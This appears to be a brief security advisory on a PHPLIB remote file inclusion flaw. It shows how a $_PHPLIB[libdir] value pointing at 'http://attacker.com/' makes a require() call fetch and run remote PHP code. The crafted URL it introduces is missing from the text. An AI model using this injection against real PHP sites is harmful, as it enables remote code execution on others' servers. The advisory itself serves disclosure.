Multiple Vendor PHPLIB Remote Script Execution Vulnerability
An example was provided by giancarlo pinerolo <firstname.lastname@example.org>:
If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:
require("http://attacker.com/" . "db_mysql.inc");
Thus, simply crafting a URL like:
will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.